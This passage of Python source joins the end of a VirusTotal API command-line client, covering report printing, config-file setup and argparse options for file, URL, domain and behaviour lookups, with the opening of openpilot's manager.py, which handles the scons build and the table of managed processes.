simple_list: if vt_file.get(key): try: self.print_key(key, indent='\n\n', separator='') print(vt_file[key]) except UnicodeEncodeError: print('') print('\nDetections:\n\t{positives}/{total} Positives/Total\n'.format(positives=vt_file.get('positives', 0), total=vt_file.get('total'))) if vt_file.get('additional_info'): print('\n\nAdditional info:') plist = [[]] for key in vt_file.get('additional_info'): if isinstance(vt_file['additional_info'][key], dict): plist.append([key, ''.join(['{key_temp}:{value}\n'.format( key_temp=key_temp, value=vt_file['additional_info'][key][key_temp]) for key_temp in vt_file['additional_info'][key]])]) elif isinstance(vt_file['additional_info'][key], list): plist.append( [key, '\n'.join(vt_file['additional_info'][key])]) else: plist.append([key, vt_file['additional_info'][key]]) pretty_print_special(plist, ['Name', 'Value'], [40, 70], False, kwargs.get('email_template')) if vt_file.get('scans'): plist = [[]] for key in vt_file['scans']: plist.append([key, 'True' if vt_file['scans'][key]['detected'] else 'False', vt_file['scans'][key]['result']]) if plist != [[]]: pretty_print_special(plist, ['Vendor name', 'Detection', 'Result'], False, False, kwargs.get('email_template')) if vt_file.get('permalink'): print('\nPermanent link : {link}\n'.format(link=vt_file['permalink'])) if kwargs.get('dump'): jsondump(jdata, 'distribution_{date}'.format( date=time.strftime("%Y-%m-%d")) ) # ToDo in search intel? def behaviour(self, *args, **kwargs): # ToDo """ u'behavior.processtree', u'info.started', u'info.version', u'network.dns', u'network.hosts', u'network.http', u'network.tcp', u'network.udp'] """ return_json = dict() result, name = is_file(kwargs.get('value')[0]) if result: jdata = load_file(name) kwargs['dump'] = False else: self.params['hash'] = kwargs.get('value')[0] url = self.base.format('file/behaviour') jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata if _check_error(jdata): return if jdata.get('info') and (kwargs.get('info') or 'info' in args): if kwargs.get('return_json'): return_json.update({'info': jdata['info']}) else: print('\nInfo\n') pretty_print(jdata['info'], ['started', 'ended', 'duration', 'version']) if (kwargs.get('behavior_network') or 'behavior_network' in args) or kwargs.get('verbose'): if jdata.get('network'): print('\nHTTP requests\n') if 'behavior-network' in jdata and 'http' in jdata.get('network'): if kwargs.get('return_json'): return_json.update({'http':jdata['network']['http']}) else: simple_list = ( 'uri', 'host', 'port', 'path', 'method', 'user-agent', 'version', 'data' ) for http in jdata['network']['http']: self.simple_print(http, simple_list) # if http.get('data') : print 'data : {0}'.format(http['data'].replace('\r\n\r\n', '\n\t').replace('\r\n','\n\t\t')) if http.get('body'): print('\tbody hex encoded:\n\t {}\n'.format(http['body'].encode('hex'))) if jdata['network'].get('hosts'): if kwargs.get('return_json'): return_json.update({'hosts': jdata['network']['hosts']}) else: pretty_print(jdata['network']['hosts'], ['hosts'], False, False, kwargs.get('email_template')) if jdata['network'].get('dns'): if kwargs.get('return_json'): return_json.update({'dns': jdata['network']['dns']}) else: print('\nDNS requests\n') pretty_print(jdata['network']['dns'], ['ip', 'hostname'], False, False, kwargs.get('email_template')) simple_list = ( 'tcp', 'upd' ) for key in simple_list: if jdata['network'].get(key): if kwargs.get('return_json'): return_json.update({key: jdata['network'][key]}) else: print('\n{0} Connections'.format(key.upper())) unique = [] for block in jdata['network'][key]: if not [block['src'], block['dst'], block['sport'], block['dport']] in unique: unique.append([block['src'], block['dst'], block['sport'], block['dport']]) pretty_print_special(unique, ['src', 'dst', 'sport', 'dport'], False, False, kwargs.get('email_template')) del unique if (kwargs.get('behavior_process') or 'behavior_process' in args) or kwargs.get('verbose'): if jdata.get('behavior'): if kwargs.get('return_json'): return_json.update({'processes': jdata['behavior']['processes']}) else: print('\n[+] Behavior') print('\n[+] Processes') for process_id in jdata['behavior']['processes']: plist = [] simple_list = ( 'parent_id', 'process_id', 'process_name' ) self.simple_print(process_id, simple_list) if process_id.get('first_seen'): print('First Seen : {0}'.format(datetime.strptime(process_id['first_seen'][:14], '%Y%m%d%H%M%S').strftime('%Y:%m:%d %H:%M:%S'))) if process_id.get('calls'): for process_part in process_id['calls']: plist = [[]] for key in process_part: if isinstance(process_part[key], list): if process_part[key] != [] and isinstance(process_part[key][0], dict): temp_list = [] for part in process_part[key]: temp_list.append('\n'.join(['{key_temp}:{value}\n'.format(key_temp=key_temp, value=part[key_temp]) for key_temp in list(part.keys())])) plist.append([key, ''.join(temp_list)]) del temp_list else: plist.append([key, '\n'.join(process_part[key])]) elif isinstance(process_part[key], dict): temp_list = [] for part in process_part[key]: temp_list += ['{key_temp}:{value}\n'.format(key_temp=key_temp, value=part[key_temp]) for key_temp in list(part.keys())] plist.append([key, ''.join(temp_list)]) del temp_list else: plist.append([key, process_part[key]]) pretty_print_special(plist, ['Name', 'Value'], [10, 50], False, kwargs.get('email_template')) del plist print('\n' + '=' * 20 + ' FIN ' + '=' * 20) print('\n[+] Process Tree\n') if jdata.get('behavior') and jdata['behavior'].get('processtree'): for tree in jdata['behavior']['processtree']: for key in tree.keys(): print('\t{key}:{value}'.format(key=key, value=tree[key])) print('\n') if (kwargs.get('behavior_summary') or 'behavior_summary' in args) or kwargs.get('verbose'): if jdata.get('behavior') and jdata['behavior'].get('summary'): simple_tt_list = ( 'files', 'keys', 'mutexes' ) for key in simple_tt_list: if jdata['behavior']['summary'].get(key): if kwargs.get('return_json'): return_json.update({key: jdata['behavior']['summary'][key]}) else: if jdata['behavior']['summary']['files']: self.simple_print(jdata['behavior']['summary'], [key]) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json def last_analysis_results(self, jdata, *args, **kwargs): sorted_data = sorted(jdata["last_analysis_results"]) for engine in sorted_data: self.print_key(engine, indent='\n', separator='[+]') pretty_print(jdata["last_analysis_results"][engine], [ 'category', 'engine_update', 'engine_version', 'method', 'result'], [15, 15, 20, 20, 10], ['c', 'c', 'c', 'c', 'c'], kwargs.get('email_template')) def __detected_samples(self, jdata, *args, **kwargs): if kwargs.get('samples') or 'samples' in args: kwargs['detected_downloaded_samples'] = \ kwargs['undetected_downloaded_samples'] = \ kwargs['detected_referrer_samples'] = \ kwargs['undetected_referrer_samples'] = \ kwargs['detected_communicated'] = \ kwargs['undetected_communicated'] = True simple_list = ( 'detected_downloaded_samples', 'undetected_downloaded_samples', 'detected_communicating_samples', 'undetected_communicating_samples', 'detected_referrer_samples', 'undetected_referrer_samples', ) return_json = dict() for key in simple_list: if jdata.get(key) and ((kwargs.get(key) or 'key' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.print_key(key, indent='\n', separator='[+]') print('\n') if isinstance(jdata[key][0].get("date", None), type(None)): sorted_data = jdata[key] else: sorted_data = sorted(jdata[key], key=methodcaller('get', 'date'), reverse=True) pretty_print(sorted_data, [ 'positives', 'total', 'date', 'sha256'], [15, 10, 20, 70], ['c', 'c', 'c', 'c'], kwargs.get('email_template')) if jdata.get('detected_urls') and ((kwargs.get('detected_urls') or 'detected_urls' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'detected_urls': jdata['detected_urls']}) else: url_size = max([len(url['url']) for url in jdata['detected_urls']]) if url_size > 80: url_size = 80 print('\n[+] Latest detected URLs\n') pretty_print(sorted(jdata['detected_urls'], key=methodcaller('get', 'scan_date'), reverse=True), [ 'positives', 'total', 'scan_date', 'url'], [9, 5, 20, url_size], ['c', 'c', 'c', 'l'], kwargs.get('email_template')) if kwargs.get('return_json'): return return_json def create_config_file(paths): path = False conf_template = """ [vt] apikey={} type={} intelligence={} engines=malwarebytes,kaspersky,drweb,eset_nod32 timeout=60 # It should be set to: 10/50/100/500/1000/5000/10000 daily_limit=100 """ while True: print("[+] Config setup start") for key, value in paths.items(): print("\t[{}] {}".format(key, value)) path = six.moves.input("[+] Select option, where you want to create config, or type custom path: ") path = path.strip() if path.isdigit(): path = int(path) if path in paths: path = os.path.expanduser(paths[path]) else: print("[-] Incorrect config path") continue apikey = six.moves.input("[+] Provide your apikey: ").encode('ascii') type_key = six.moves.input("[+] Your apikey is pubic/private: ").encode('ascii') intelligence = six.moves.input("[+] You have access to VT intelligence True/False: ").encode('ascii') if sys.version_info.major == 3: apikey = apikey.decode("utf-8") type_key = type_key.decode("utf-8") intelligence = intelligence.decode("utf-8") try: tmp = open(path, "w") tmp.write(conf_template.format(apikey, type_key, intelligence)) tmp.close() print("[+] Config created at: {}".format(path)) break except Exception as e: print(e) return path def read_conf(config_file = False): global proxies vt_config = {'intelligence': False, 'apikey': '', 'type': False} paths = { 0:'.vtapi', 1:'vtapi.conf', 2:'~/.vtapi', 3:'~/vtapi.conf' } help = ''' No API key provided or cannot read ~ /.vtapi. Specify an API key in vt.py or in ~ /.vtapi. Format: [vt] apikey=your-apikey-here type=public #private if you have private api intelligence=False # True if you have access engines=microsoft,malwarebytes,kaspersky,drweb,eset_nod32 timeout=60 # ex: http://localhost:8118 proxy= For more information check: https://github.com/doomedraven/VirusTotalApi ''' if not config_file: # config in home or in local dirrectory for conf in paths.values(): if os.path.exists(os.path.expanduser(conf)): config_file = conf break if not config_file: config_file = create_config_file(paths) try: confpath = os.path.expanduser(config_file) if os.path.exists(confpath): config = six.moves.configparser.RawConfigParser() config.read(confpath) if config.has_section('vt'): vt_config = dict(config.items('vt')) if not vt_config.get('apikey'): sys.exit(help) else: sys.exit('\nFile {0} don\'t exists\n'.format(confpath)) except Exception: sys.exit(help) if "proxy" in vt_config and vt_config["proxy"]: proxies = { "http": vt_config["proxy"], "https": vt_config["proxy"] } for key in vt_config: #backward compartibility if key == 'type': if vt_config[key].lower() == 'private': apitype = True else: apitype = False key = 'api_type' vt_config[key] = apitype del vt_config['type'] del apitype if vt_config[key] in ('False', 'True'): vt_config[key] = ast.literal_eval(vt_config[key]) return vt_config def main(): global apikey vt_config = read_conf() if vt_config.get('timeout'): global req_timeout req_timeout = int(vt_config.get('timeout')) opt = argparse.ArgumentParser('value', description='Scan/Search/ReScan/JSON parse') opt.add_argument('-fi', '--file-info', action='store_true', help='Get PE file info, all data extracted offline, for work you need have installed PEUTILS library') opt.add_argument('-udb', '--userdb', action='store', help='Path to your userdb file, works with --file-info option only') opt.add_argument('value', nargs='*', help='Enter the Hash, Path to File(s) or Url(s)') opt.add_argument('-fs', '--file-search', action='store_true', help='File(s) search, this option, don\'t upload file to VirusTotal, just search by hash, support linux name wildcard, example: /home/user/*malware*, if file was scanned, you will see scan info, for full scan report use verbose mode, and dump if you want save already scanned samples') opt.add_argument('-f', '--file-scan', action='store_true', dest='files', help='File(s) scan, support linux name wildcard, example: /home/user/*malware*, if file was scanned, you will see scan info, for full scan report use verbose mode, and dump if you want save already scanned samples') opt.add_argument('-fr', '--file-scan-recursive', action='store_true', dest='files', help='Recursive dir walk, use this insted of --file-scan if you want recursive') opt.add_argument('-u', '--url-scan', action='store_true', help='Url scan, support space separated list, Max 4 urls (or 25 if you have private api), but you can provide more urls, for example with public api, 5 url - this will do 2 requests first with 4 url and other one with only 1, or you can specify file filename with one url per line') opt.add_argument('-ur', '--url-report', action='store_true', help='Url(s) report, support space separated list, Max 4 (or 25 if you have private api) urls, you can use --url-report --url-scan options for analysing url(s) if they are not in VT data base, read previev description about more then max limits or file with urls') opt.add_argument('-d', '--domain-info', action='store_true', dest='domain', help='Retrieves a report on a given domain. It will retrieve all relationships data') opt.add_argument('-dpc', '--domain-post-comments', action='store', help='Add comment(s) for an domain name') opt.add_argument('-dgc', '--domain-get-comments', action='store_true', help='Get comment(s) for an domain name') opt.add_argument('-i', '--ip-info', action='store_true', dest='ip', help='A valid IPv4 address in dotted quad notation, for the time being only IPv4 addresses are supported., It will retrieve all relationships data') opt.add_argument('-ipc', '--ip-post-comments', action='store', help='Add comment(s) for an IP address') opt.add_argument('-igc', '--ip-get-comments', action='store_true', help='Get comment(s) for an IP address') opt.add_argument('-w', '--walk', action='store_true', default=False, help='Work with domain-info, will walk throuth all detected ips and get information, can be provided ip parameters to get only specific information') opt.add_argument('-s', '--search', action='store_true', help='A md5/sha1/sha256 hash for which you want to retrieve the most recent report. You may also specify a scan_id (sha256-timestamp as returned by the scan API) to access a specific report. You can also specify a space separated list made up of a combination of hashes and scan_ids Public API up to 4 items/Private API up to 25 items, this allows you to perform a batch request with one single call.') opt.add_argument('-si', '--search-intelligence', action='store_true', help='Search query, help can be found here - https://www.virustotal.com/intelligence/help/') opt.add_argument('-sil', '--search-intelligence-limit', action='store', default=1, type=int, help='limit search intelligence paging, 300 hashes per page, default 1 page') opt.add_argument('-et', '--email-template', action='store_true', help='Table format template for email') if vt_config.get('api_type'): allinfo_opt = opt.add_argument_group('All information related') allinfo_opt.add_argument('-rai', '--report-all-info', action='store_true', help='If specified and set to one, the call will return additional info, other than the antivirus results, on the file being queried. This additional info includes the output of several tools acting on the file (PDFiD, ExifTool, sigcheck, TrID, etc.), metadata regarding VirusTotal submissions (number of unique sources that have sent the file in the past, first seen date, last seen date, etc.), and the output of in-house technologies such as a behavioural sandbox.') allinfo_opt.add_argument('-itu', '--ITW-urls', action='store_true', help='In the wild urls') allinfo_opt.add_argument('-cw', '--compressedview', action='store_true', help='Contains information about extensions, file_types, tags, lowest and highest datetime, num children detected, type, uncompressed_size, vhash, childrens') allinfo_opt.add_argument('-dep', '--detailed-email-parents', action='store_true', help='Contains information about emails, as Subject, sender, receiver(s), full email, and email hash to download it') allinfo_opt.add_argument('-eo', '--email-original', default=False, action='store_true', help='Will retreive original email and process it') allinfo_opt.add_argument('-snr', '--snort', action='store_true', help='Get Snort results') allinfo_opt.add_argument('-srct', '--suricata', action='store_true', help='Get Suricata results') allinfo_opt.add_argument('-tir', '--traffic-inspection', action='store_true', help='Get Traffic inspection info') allinfo_opt.add_argument('-wir', '--wireshark-info', action='store_true', help='Get Wireshark info') allinfo_opt.add_argument('-rbgi', '--rombios-generator-info', action='store_true', help='Get RomBios generator info') allinfo_opt.add_argument('-rbi', '--rombioscheck-info', action='store_true', help='Get RomBiosCheck info') allinfo_opt.add_argument('-agi', '--androidguard-info', action='store_true', help='Get AndroidGuard info') allinfo_opt.add_argument('-dbc', '--debcheck-info', action='store_true', help='Get DebCheck info, also include ios IPA') opt.add_argument('-ac', '--add-comment', action='store_true', help='The actual review, you can tag it using the "#" twitter-like syntax (e.g. #disinfection #zbot) and reference users using the "@" syntax (e.g. @VirusTotalTeam). supported hashes MD5/SHA1/SHA256') opt.add_argument('-gc', '--get-comments', action='store_true', help='Either a md5/sha1/sha256 hash of the file or the URL itself you want to retrieve') if vt_config.get('api_type'): opt.add_argument('--get-comments-before', action='store', dest='date', default=False, help='A datetime token that allows you to iterate over all comments on a specific item whenever it has been commented on more than 25 times. Token format 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00') opt.add_argument('-v', '--verbose', action='store_true', dest='verbose', help='Turn on verbosity of VT reports') opt.add_argument('-j', '--dump', action='store_true', help='Dumps the full VT report to file (VTDL{md5}.json), if you (re)scan many files/urls, their json data will be dumped to separetad files') opt.add_argument('--csv', action='store_true', default = False, help='Dumps the AV\'s detections to file (VTDL{scan_id}.csv)') opt.add_argument('-rr', '--return-raw', action='store_true', default = False, help='Return raw json, in case if used as library and want parse in other way') opt.add_argument('-rj', '--return-json', action='store_true', default = False, help='Return json with parts activated, for example -p for pasive dns, etc') opt.add_argument('-V', '--version', action='store_true', default = False, help='Show version and exit') rescan = opt.add_argument_group('Rescan options') rescan.add_argument('-r', '--rescan', action='store_true', help='Allows you to rescan files in VirusTotal\'s file store without having to resubmit them, thus saving bandwidth, support space separated list, MAX 25 hashes, can be local files, hashes will be generated on the fly, support linux wildmask') if vt_config.get('api_type'): rescan.add_argument('--delete', action='store_true',help='A md5/sha1/sha256 hash for which you want to delete the scheduled scan') rescan.add_argument('--date', action='store', dest='date',help='A Date in one of this formats (example: 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00) in which the rescan should be performed. If not specified the rescan will be performed immediately.') rescan.add_argument('--period', action='store',help='Period in days in which the file should be rescanned. If this argument is provided the file will be rescanned periodically every period days, if not, the rescan is performed once and not repated again.') rescan.add_argument('--repeat', action='store',help='Used in conjunction with period to specify the number of times the file should be rescanned. If this argument is provided the file will be rescanned the given amount of times, if not, the file will be rescanned indefinitely.') if vt_config.get('api_type'): scan_rescan = opt.add_argument_group('File scan/Rescan shared options') scan_rescan.add_argument('--notify-url', action='store', help='An URL where a POST notification should be sent when the scan finishes.') scan_rescan.add_argument('--notify-changes-only', action='store_true', help='Used in conjunction with --notify-url. Indicates if POST notifications should be sent only if the scan results differ from the previous one.') domain_opt = opt.add_argument_group( 'Domain/IP shared verbose mode options, by default just show resolved IPs/Passive DNS') domain_opt.add_argument('-wh', '--whois', action='store_true', default=False, help='Whois data') domain_opt.add_argument('-wht', '--whois-timestamp', action='store_true', default=False, help='Whois timestamp') domain_opt.add_argument('-pdns', '--resolutions', action='store_true', default=False, help='Passive DNS resolves') domain_opt.add_argument('--asn', action='store_true', default=False, help='ASN number') domain_opt.add_argument('-aso', '--as-owner', action='store_true', default=False, help='AS details') domain_opt.add_argument('--country', action='store_true', default=False, help='Country') domain_opt.add_argument('--subdomains', action='store_true', default=False, help='Subdomains') domain_opt.add_argument('--domain-siblings', action='store_true', default=False, help='Domain siblings') domain_opt.add_argument('-cat','--categories', action='store_true', default=False, help='Categories') domain_opt.add_argument('-alc', '--alexa-cat', action='store_true', default=False, help='Alexa category') domain_opt.add_argument('-alk', '--alexa-rank', action='store_true', default=False, help='Alexa rank') domain_opt.add_argument('-opi', '--opera-info', action='store_true', default=False, help='Opera info') domain_opt.add_argument('--drweb-cat', action='store_true', default=False, help='Dr.Web Category') domain_opt.add_argument('-adi', '--alexa-domain-info', action='store_true', default=False, help='Just Domain option: Show Alexa domain info') domain_opt.add_argument('-wdi', '--wot-domain-info', action='store_true', default=False, help='Just Domain option: Show WOT domain info') domain_opt.add_argument('-tm', '--trendmicro', action='store_true', default=False, help='Just Domain option: Show TrendMicro category info') domain_opt.add_argument('-wt', '--websense-threatseeker', action='store_true', default=False, help='Just Domain option: Show Websense ThreatSeeker category') domain_opt.add_argument('-bd', '--bitdefender', action='store_true', default=False, help='Just Domain option: Show BitDefender category') domain_opt.add_argument('-wd', '--webutation-domain', action='store_true', default=False, help='Just Domain option: Show Webutation domain info') domain_opt.add_argument('-du', '--detected-urls', action='store_true', default=False, help='Just Domain option: Show latest detected URLs') domain_opt.add_argument('--pcaps', action='store_true', default=False, help='Just Domain option: Show all pcaps hashes') domain_opt.add_argument('--samples', action='store_true', help='Will activate -dds -uds -dc -uc -drs -urs') domain_opt.add_argument('-dds', '--detected-downloaded-samples', action='store_true', default=False, help='Domain/Ip options: Show latest detected files that were downloaded from this ip') domain_opt.add_argument('-uds', '--undetected-downloaded-samples', action='store_true', default=False, help='Domain/Ip options: Show latest undetected files that were downloaded from this domain/ip') domain_opt.add_argument('-dc', '--detected-communicated', action='store_true', default=False, help='Domain/Ip Show latest detected files that communicate with this domain/ip') domain_opt.add_argument('-uc', '--undetected-communicated', action='store_true', default=False, help='Domain/Ip Show latest undetected files that communicate with this domain/ip') domain_opt.add_argument('-drs', '--detected-referrer-samples', action='store_true', default=False, help='Undetected referrer samples') domain_opt.add_argument('-urs', '--undetected-referrer-samples', action='store_true', default=False, help='Undetected referrer samples') email_opt = opt.add_argument_group('Process emails') email_opt.add_argument('-pe', '--parse-email', action='store_true', default=False, help='Parse email, can be string or file') email_opt.add_argument('-esa', '--save-attachment', action='store', default=False, help='Save email attachment, path where to store') email_opt.add_argument('-peo', '--parse-email-outlook', action='store_true', default=False, help='Parse outlook .msg, can be string or file') if vt_config.get('api_type'): behaviour = opt.add_argument_group('Behaviour options') behaviour.add_argument('-bh', '--behaviour', action='store_true', help='The md5/sha1/sha256 hash of the file whose dynamic behavioural report you want to retrieve.\ VirusTotal runs a distributed setup of Cuckoo sandbox machines that execute the files we receive. Execution is attempted only once, upon\ first submission to VirusTotal, and only Portable Executables under 10MB in size are ran. The execution of files is a best effort process,\ hence, there are no guarantees about a report being generated for a given file in our dataset. a file did indeed produce a behavioural report,\ a summary of it can be obtained by using the file scan lookup call providing the additional HTTP POST parameter allinfo=1. The summary will\ appear under the behaviour-v1 property of the additional_info field in the JSON report.This API allows you to retrieve the full JSON report\ of the files execution as outputted by the Cuckoo JSON report encoder.') behaviour.add_argument('-bn', '--behavior-network', action='store_true', help='Show network activity') behaviour.add_argument('-bp', '--behavior-process', action='store_true', help='Show processes') behaviour.add_argument('-bs', '--behavior-summary', action='store_true', help='Show summary') if vt_config.get('api_type') or vt_config.get('intelligence'): downloads = opt.add_argument_group('Download options') downloads.add_argument('-dl', '--download', dest='download', action='store_const', const='file', default=False, help='The md5/sha1/sha256 hash of the file you want to download or txt file with .txt extension, with hashes, or hash and type, one by line, for example: hash,pcap or only hash. Will save with hash as name, can be space separated list of hashes to download') downloads.add_argument('-nm', '--name', action='store', default="", help='Name with which file will saved when download it') downloads.add_argument('-dt', '--download-threads', action='store', default=5, type=int, help='Number of simultaneous downloaders') if vt_config.get('api_type'): more_private = opt.add_argument_group('Additional options') more_private.add_argument('--pcap', dest='download', action='store_const', const='pcap', default=False, help='The md5/sha1/sha256 hash of the file whose network traffic dump you want to retrieve. Will save as hash.pcap') more_private.add_argument('--clusters', action='store_true',help='A specific day for which we want to access the clustering details, example: 2013-09-10') # more_private.add_argument('--search-by-cluster-id', action='store_true', help=' the id property of each cluster allows users to list files contained in the given cluster, example: vhash 0740361d051)z1e3z 2013-09-10') more_private.add_argument('--distribution-files', action='store_true', help='Timestamps are just integer numbers where higher values mean more recent files. Both before and after parameters are optional, if they are not provided the oldest files in the queue are returned in timestamp ascending order.') more_private.add_argument('--distribution-urls', action='store_true', help='Timestamps are just integer numbers where higher values mean more recent urls. Both before and after parameters are optional, if they are not provided the oldest urls in the queue are returned in timestamp ascending order.') if vt_config.get('api_type'): dist = opt.add_argument_group('Distribution options') dist.add_argument('--before', action='store', help='File/Url option. Retrieve files/urls received before the given timestamp, in timestamp descending order.') dist.add_argument('--after', action='store', help='File/Url option. Retrieve files/urls received after the given timestamp, in timestamp ascending order.') dist.add_argument('--reports', action='store_true', default=False, help='Include the files\' antivirus results in the response. Possible values are \'true\' or \'false\' (default value is \'false\').') dist.add_argument('--limit', action='store', help='File/Url option. Retrieve limit file items at most (default: 1000).') dist.add_argument('--allinfo', action='store_true', help='will include the results for each particular URL scan (in exactly the same format as the URL scan retrieving API). If the parameter is not specified, each item returned will onlycontain the scanned URL and its detection ratio.') options = opt.parse_args() if options.version: print('Version:', __version__) print('Current path:', os.path.dirname(os.path.realpath(__file__))) sys.exit() options = vars(options) apikey = vt_config.get('apikey') vt = vtAPI() options.update(vt_config) if options.get('date', ""): options['date'] = options['date'].replace( '-', '').replace(':', '').replace(' ', '') if options.get('files') or options.get('file_scan_recursive'): options.update({'scan': True}) vt.fileScan(**options) elif options['file_info']: vt.fileInfo(**options) elif options['file_search']: options.update({'scan': False}) vt.fileScan(**options) elif options.get('url_scan') and not options.get('url_report'): options.update({'key': 'scan'}) vt.url_scan_and_report(**options) elif options.get('url_report'): options.update({'action': 0}) if options['url_scan']: options.update({'action': 1}) options.update({'key': 'report'}) vt.url_scan_and_report(**options) elif options.get('rescan'): if options.get('date', ""): if len(options['date']) < 14: print('\n[!] Date format is: 20120725170000 or 2012-07-25 17 00 00 or 2012-07-25 17:00:00\n') sys.exit() now = time.strftime("%Y:%m:%d %H:%M:%S") if now >= relativedelta(options['date']): print('\n[!] Date must be greater then today\n') sys.exit() vt.rescan(**options) elif options.get('domain') or options.get('ip'): if 'http' in options['value'][0]: options['value'][0] = urlparse(options['value'][0]).netloc if match('\w{1,3}\.\w{1,3}\.\w{1,3}\.\w{1,3}', options['value'][0]): vt.getIP(**options) else: vt.getDomain(**options) elif options.get('report_all_info'): options.update({'allinfo': 1}) vt.getReport(**options) elif (options.get('search') or options.get('search_intelligence')) and \ not options['domain'] and not options['ip'] and not options['url_scan'] and \ not options['url_report']: options.update({'allinfo': 0}) vt.getReport(**options) elif options.get('download') and not (options.get('parse_email') or options.get('parse_email_outlook')): vt.download(**options) elif options.get('parse_email'): vt.parse_email(**options) elif options.get('parse_email_outlook'): vt.parse_email_outlook(**options) elif options.get('behaviour'): vt.behaviour(**options) elif options.get('distribution_files'): options.update({'action': 'file'}) vt.distribution(**options) elif options.get('distribution_urls'): options.update({'action': 'url'}) vt.distribution(**options) elif options.get('add_comment') and len(options['value']) == 2: options.update({'action': 'add'}) vt.comment(**options) elif options.get('get_comments'): options.update({'action': 'get'}) vt.comment(**options) elif options.get('clusters'): vt.clusters(**options) # elif options.search_by_cluster_id: # vt.clusters(options.value, options.dump, True) if __name__ == '__main__': main()
manager.py
#!/usr/bin/env python3 import os import time import sys import fcntl import errno import signal import shutil import subprocess import datetime import textwrap from typing import Dict, List from selfdrive.swaglog import cloudlog, add_logentries_handler from common.basedir import BASEDIR, PARAMS from common.android import ANDROID WEBCAM = os.getenv("WEBCAM") is not None sys.path.append(os.path.join(BASEDIR, "pyextra")) os.environ['BASEDIR'] = BASEDIR TOTAL_SCONS_NODES = 1140 prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt')) # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") if ANDROID: os.chmod("/dev/shm", 0o777) def unblock_stdout(): # get a non-blocking stdout child_pid, child_pty = os.forkpty() if child_pid != 0: # parent # child is in its own process group, manually pass kill signals signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT)) signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM)) fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK) while True: try: dat = os.read(child_pty, 4096) except OSError as e: if e.errno == errno.EIO: break continue if not dat: break try: sys.stdout.write(dat.decode('utf8')) except (OSError, IOError, UnicodeDecodeError): pass # os.wait() returns a tuple with the pid and a 16 bit value # whose low byte is the signal number and whose high byte is the exit satus exit_status = os.wait()[1] >> 8 os._exit(exit_status) if __name__ == "__main__": unblock_stdout() if __name__ == "__main__" and ANDROID: from common.spinner import Spinner from common.text_window import TextWindow else: from common.spinner import FakeSpinner as Spinner from common.text_window import FakeTextWindow as TextWindow import importlib import traceback from multiprocessing import Process # Run scons spinner = Spinner() spinner.update("0") if not prebuilt: for retry in [True, False]: # run scons env = os.environ.copy() env['SCONS_PROGRESS'] = "1" env['SCONS_CACHE'] = "1" nproc = os.cpu_count() j_flag = "" if nproc is None else "-j%d" % (nproc - 1) scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE) compile_output = [] # Read progress from stderr and update spinner while scons.poll() is None: try: line = scons.stderr.readline() # type: ignore if line is None: continue line = line.rstrip() prefix = b'progress: ' if line.startswith(prefix): i = int(line[len(prefix):]) if spinner is not None: spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES))) elif len(line): compile_output.append(line) print(line.decode('utf8', 'replace')) except Exception: pass if scons.returncode != 0: # Read remaining output r = scons.stderr.read().split(b'\n') # type: ignore compile_output += r if retry: print("scons build failed, cleaning in") for i in range(3,-1,-1): print("....%d" % i) time.sleep(1) subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env) shutil.rmtree("/tmp/scons_cache") else: # Build failed log errors errors = [line.decode('utf8', 'replace') for line in compile_output if any([err in line for err in [b'error: ', b'not found, needed by target']])] error_s = "\n".join(errors) add_logentries_handler(cloudlog) cloudlog.error("scons build failed\n" + error_s) # Show TextWindow error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors]) with TextWindow("Openpilot failed to build\n \n" + error_s) as t: t.wait_for_exit() exit(1) else: break import cereal import cereal.messaging as messaging from common.params import Params import selfdrive.crash as crash from selfdrive.registration import register from selfdrive.version import version, dirty from selfdrive.loggerd.config import ROOT from selfdrive.launcher import launcher from common import android from common.apk import update_apks, pm_apply_packages, start_offroad from common.manager_helpers import print_cpu_usage ThermalStatus = cereal.log.ThermalData.ThermalStatus # comment out anything you don't want to run managed_processes = { "thermald": "selfdrive.thermald.thermald", "uploader": "selfdrive.loggerd.uploader", "deleter": "selfdrive.loggerd.deleter", "controlsd": "selfdrive.controls.controlsd", "plannerd": "selfdrive.controls.plannerd", "radard": "selfdrive.controls.radard", "dmonitoringd": "selfdrive.controls.dmonitoringd", "ubloxd": ("selfdrive/locationd", ["./ubloxd"]), "loggerd": ("selfdrive/loggerd", ["./loggerd"]), "logmessaged": "selfdrive.logmessaged", "locationd": "selfdrive.locationd.locationd", "tombstoned": "selfdrive.tombstoned", "logcatd": ("selfdrive/logcatd", ["./logcatd"]), "proclogd": ("selfdrive/proclogd", ["./proclogd"]), "boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly "pandad": "selfdrive.pandad", "ui": ("selfdrive/ui", ["./ui"]), "calibrationd": "selfdrive.locationd.calibrationd", "paramsd": ("selfdrive/locationd", ["./paramsd"]), "camerad": ("selfdrive/camerad", ["./camerad"]), "sensord": ("selfdrive/sensord", ["./sensord"]), "clocksd": ("selfdrive/clocksd", ["./clocksd"]), "gpsd": ("selfdrive/sensord", ["./gpsd"]), "updated": "selfdrive.updated", "dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]), "modeld": ("selfdrive/modeld", ["./modeld"]), "driverview": "selfdrive.controls.lib.driverview", } daemon_processes = { "manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"), } running: Dict[str, Process] = {} def get_running(): return running # due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption unkillable_processes = ['camerad'] # processes to end with SIGINT instead of SIGTERM interrupt_processes: List[str] = [] # processes 